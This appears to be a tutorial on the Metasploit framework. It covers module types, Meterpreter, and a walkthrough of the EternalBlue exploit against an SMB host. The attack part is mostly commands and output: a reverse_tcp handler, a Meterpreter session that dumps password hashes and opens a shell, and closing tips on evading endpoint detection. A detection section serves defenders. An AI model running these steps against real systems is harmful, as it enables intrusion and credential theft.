Modules Explained

Metasploit is built around a modular architecture. Every component is a module with a specific purpose:

Module TypePurposeExample
ExploitCode that takes advantage of a vulnerabilityexploit/windows/smb/ms17_010_eternalblue
PayloadCode that runs on the target after exploit succeedswindows/x64/meterpreter/reverse_tcp
AuxiliarySupporting modules (scanners, fuzzers, sniffers)auxiliary/scanner/portscan/tcp
PostPost-exploitation modules (persistence, data exfiltration)post/windows/manage/migrate
EncoderObfuscates payloads to avoid detectionencoder/x64/shikata_ga_nai
NOPNo-operation sleds for buffer paddinggeneric/nop

Meterpreter Deep Dive

Meterpreter is Metasploit's most powerful payload. It's a dynamically extensible agent that runs in memory on the target system, providing a full-featured command shell with extensive post-exploitation capabilities.

# Starting a Meterpreter handler
$ msfconsole -q -x "
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.1
set LPORT 4444
run -j
"

[*] Started reverse TCP handler on 192.168.1.1:4444
[*] Sending stage (176219 bytes) to 192.168.1.147
[*] Meterpreter session 1 opened

# Meterpreter commands (after session opens)
meterpreter > sysinfo
[-] Computer        : DESKTOP-JOHN
[-] OS              : Windows 10 (10.0 Build 19044)
[-] Architecture    : x64
[-] Domain          : ACMECORP

meterpreter > getuid
Server username: DESKTOP-JOHN\John

meterpreter > screenshot
[+] Screenshot saved to: /root/screenshot.jpg

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
John:1001:aad3b435b51404eeaad3b435b51404ee:5f4dcc3b5aa765d61d8327deb882cf99:::

meterpreter > shell
[-] Starting native shell
C:\Users\John> whoami
acmecorp\john

Basic Usage Walkthrough

# msfconsole workflow for authorized penetration testing
$ msfconsole

# 1. Search for a vulnerability module
msf6 > search smb ms17_010
  # 0  exploit/windows/smb/ms17_010_eternalblue     2017-03-14  excellent  Yes
  # 1  exploit/windows/smb/ms17_010_psexec        2017-03-14  normal    Yes

# 2. Select the exploit
msf6 > use 0

# 3. Set required options
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.0.0.50
msf6 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.0.0.100

# 4. Verify options
msf6 exploit(windows/smb/ms17_010_eternalblue) > check
[+] 10.0.0.50:445 — The target is vulnerable. (Windows 7 Ultimate 7601 Service Pack 1)

# 5. Run the exploit
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 10.0.0.100:4444
[*] Sending stage (176219 bytes)
[*] Meterpreter session 1 opened
[+] Target pwned!

Detection Considerations

Modern EDR (Endpoint Detection and Response) solutions are effective at detecting Meterpreter. Detection methods include:

  • Memory analysis: Meterpreter runs entirely in memory — unusual process behavior patterns
  • Network behavior: Reverse TCP connections to unusual ports, encrypted but identifiable traffic patterns
  • Process injection detection: Meterpreter injects into legitimate processes (explorer.exe, svchost.exe)
  • Sysmon logs: Sysmon Event ID 8 (CreateRemoteThread) flags process injection

Staged Meterpreter payloads are more detectable than stageless ones. Using custom shellcode, modifying default ports, and VPN-based C2 channels help evade detection in advanced red team operations.